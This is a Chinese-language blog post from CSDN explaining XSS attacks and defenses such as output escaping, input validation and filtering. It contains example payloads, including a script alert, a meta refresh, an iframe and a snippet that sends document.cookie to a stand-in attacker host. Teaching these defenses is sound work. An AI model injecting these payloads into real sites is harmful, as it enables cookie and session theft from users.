网站xss攻击和防止

最新推荐文章于 2024-07-31 15:36:49 发布
最新推荐文章于 2024-07-31 15:36:49 发布
阅读量2.4k 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stitch77/article/details/51525477
版权

1.定义

XSS又称CSS,全称CrossSiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie 、破坏页面结构、重定向到其它网站等。
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web 安全的头号大敌。

xss攻击流程



2.分为几种类型
第一、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。如:点击恶意链接。

第二、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。当用户访问输出该数据的页面时,就会促发XSS 攻击。具有很强的稳定性。


3.XSS 条件和攻击类型
攻击的条件

实施 XSS 攻击需要具备两个条件:
一、需要向 web 页面注入恶意代码;
二、这些恶意代码能够被浏览器成功的执行。

看看常见的恶意字符XSS输入:

1.XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框: <script>alert("XSS");</script>
2.XSS 输入也可能是 HTML 代码段,譬如:
       (1). 网页不停地刷新 <meta http-equiv="refresh"content="0;">
       (2). 嵌入其它网站的链接 < iframe src =http://xxxxwidth=250 height=250></ iframe >


4.XSS攻击能做些什么
1. 窃取 cookies ,读取目标网站的 cookie 发送到黑客的服务器上,如下面的代码:
     var i=document.createElement("img");
     document.body.appendChild(i);
     i.src ="http://www.hackerserver.com/?c=" + document.cookie;
2. 读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等。

3. 前面两个是读的操作,其实还可进行写的操作,比如说:删除用户的博客,转发指定的微博,向用户的联系人发送带有恶意代码的信息,进行下一步的传播。


5.XSS攻击防御
a.输出检查
根据 XSS 攻击的条件,我们可以对用户输出进行检查,使用系统的安全函数进行转义将数据和代码分开,根据不同的场景使用正确的安全函数,否则效果适得其反。

b.输入检查
通常用于检测用户输入的数据是否符合预期的格式,比如日期格式, Email 格式,电话号码格式等等;输入检查必须在服务端进行;当然为了提高用户体验和减轻服务端的资源客户端也要进行一次检查,但服务端检查始终是必须的,有个别程序员却调过来了认为客户端检查是必须的,服务端检查是可选的,其实这是错误的逻辑,因为客户端很容易被黑客绕过。使用php htmlspecialchars()函数转换为html实体

c.转换为安全的类型
类型检查或者类型转换到安全的类型,比如: int,float, 枚举类型等等,如在前面一个例子中将 id 转换为 int 类型即可
 <div>
<imgsrc="/images/handler.ashx?id=<%=  int.Parse(Request.QueryString["id"]) %>"/>
</div>
$aa = 'xxxxx'; (int)$aa;

d.智能过滤恶意代码
通过正确的输出检查我们能够将数据安全的输出到浏览器中,但有些时候会带来不好的用户体验,当用户通过 html 编辑器提交的数据
显然这个肯定不是用户想要的展示结果,所以我们要对这种富文本进行过滤,把恶意代码摘除;如一些敏感关键字: javascript vbscript,<script> 等等,那么是不是把这些关键词摘除掉就高枕无忧了呢?答案是否定的。











Stitch77
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS攻击的预防措施
qq_45335911的博客
09-07 6465
XSS攻击的预防 结合上一篇文章知道了XSS的基本攻击方式和基本概念,这里就主要讲一下如何预防XSS的攻击。 上面是我在网上找的一个可以作为简单理解的概念图,如果不理解可以根据顺序参照理解。 预防储存型和反射型XSS攻击 存储型和反射型 XSS 都是在服务端取出恶意代码后,插入到响应 HTML 里的,攻击者刻意编写的“数据”被内嵌到“代码”中,被浏览器所执行。 预防这两种漏洞,有两种常见做法: 改成纯前端渲染,把代码和数据分隔开。 对 HTML 做充分转义。 纯前端渲染 纯前端渲染的过程: 浏览器先加载一
XSS攻击的解决方法
weixin_33877092的博客
02-28 793
在我上一篇《前端安全之XSS攻击》文中,并没有把XSS攻击的解决办法说完整,而XSS的攻击又那么五花八门,有没有一招“独孤九剑”能够抗衡,毕竟那么多情况场景,开发人员无法一一照顾过来,而今天通过阅读《白帽子讲Web安全》这本书,对应对方式有了更好的总结,分为两类,一是服务端可以干的事,二是客户端可以干的事。 前提 在说XSS解决方式时,有一个前提。就是同源策略——浏览器的同源策略(浏览器安全的...
手摸手带你进行XSS攻击与防御
最新发布
公众号:该用户快成仙了
07-31 940
简单来说,通过设置CSP来控制浏览器加载页面时允许执行的资源来源,这样来减少XSS攻击
xss攻击问题以及如何防范
weixin_33921089的博客
09-30 166
当用户提交评论的时候,比如如下评论内容 111 <scripy>alert(111);</scripy> 这样当现实评论的时候会先弹出111弹框,再显示评论。这就是xss攻击。 所以,我们需要对评论内容进行检测,对恶意代码进行删除,不让不存到数据库。 如下解决方案: def add_article(request): if request...
防止xss攻击
x386277405的专栏
09-21 377
防止xxs攻击过滤,代码清单如下 package com.security; import java.io.IOException; import java.util.Arrays; import java.util.List; import java.util.Map; import javax.servlet.Filter; import javax.servle
防止XSS攻击解决办法
01-20
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现
web安全之XSS攻击原理及防范
weixin_43964148的博客
06-22 2734
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nHwrCkXL-1592795850369)(https://static01.imgkr.com/temp/e31bf9555c2e44eeb535ca5ad63dda63.png)] 一:什么是XSS攻击? XSS 即(Cross Site Scripting)中文名称为:跨站脚本攻击。XSS的重点不在于跨站点,而在于脚本的执行。那么XSS的原理是: 恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
PHP如何防止XSS攻击XSS攻击原理的讲解
10-17
8. 教育和培训:对于开发团队进行安全意识教育和培训,让每个开发人员都意识到安全编码的重要性,以及学习如何预防XSS攻击。 在实际应用中,应当根据应用程序的具体情况,采取合适的防护措施。全面地结合上述方法,...
springmvc4配置防止XSS攻击的方法
04-05
XSS攻击是指攻击者通过在网页中嵌入恶意脚本代码,当其他用户浏览该网页时,恶意代码会执行,导致用户信息泄露、网站内容篡改等问题。而SQL注入攻击则是通过在Web应用的数据库查询接口输入恶意的SQL语句,以达到控制...
网站防止XSS攻击
changNet的专栏
07-19 1033
防止XSS攻击 名词解释:XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。 1、鹏云留学: XSS 是如何发生的呢 假如有下面一个textbox
XSS***防范
weixin_33920401的博客
03-06 294
背景今天突然接到公司安全部门发来的邮件。说:网站有XSS注入***漏洞,得修复一下。之前也只是对这个有个概念上的理解,知道XSS有反射型XSS、存储型XSS和DOM型XSS。对它到底会造成什么破坏还是没有什么理解。直到这次安全部门发来了我登录我们后台的cookie,我才明白了这个***好牛逼。他们用的是存储型的XSS,把它们的坏脚本直接植入到了我们的数据库里去了,后台审核他们...
防止XSS攻击的方式
weixin_30500663的博客
03-07 360
主要有三种请求方式,进行过滤替换非法符号 1.普通的GET请求数据: 2.FORM表单提交数据: 3.Json格式数据提交: 把下面5个文件放入项目中即可 1 package com.joppay.admin.security.xss; 2 3 import org.springframework.util.StringUtils; 4 import org.sp...
如何防止XSS攻击
m0_49521873的博客
05-23 6607
3. 设置HTTP头部:设置HTTP头部,包括Content-Security-Policy、X-Content-Type-Options、X-XSS-Protection等,来使浏览器拦截来自第三方资源的恶意脚本。4. 使用脚本过滤器:使用脚本过滤器,如Google的Closure Library和jQuery库等,能够对来自用户的数据进行过滤和检查。2. 转义特殊字符:在网页中用户输入的内容需要使用转义字符,例如将 < 转义成 <,将 > 转义成 >,避免浏览器将这些字符误解为标签等。
如何预防 XSS 攻击
春风化雨
12-17 5496
1、XSS 攻击 XSS 攻击,即跨站脚本攻击,它是 Web 程序中常见的漏洞。 原理:攻击者在Web 页面里植入恶意的脚本代码(css 代码、Javascript 代码等);当其他用户浏览该页面时,嵌入其中的脚本代码会被执行,从而达到恶意攻击用户的目的。比如:盗取用户 cookie、破坏页面结构、重定向到其他网站等。 2、预防策略 预防 XSS 的核心:对输入的数据做必要的过滤处理。 ...
cookie和xss攻击
09-27
为了防止 XSS 攻击,可以采取以下措施: 1. 对用户输入进行正确的验证和过滤,以防止执行恶意脚本代码。 2. 在向页面插入动态内容时,使用合适的编码方法,如将用户提供的数据作为文本内容而不是 HTML 解析。 3. 在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值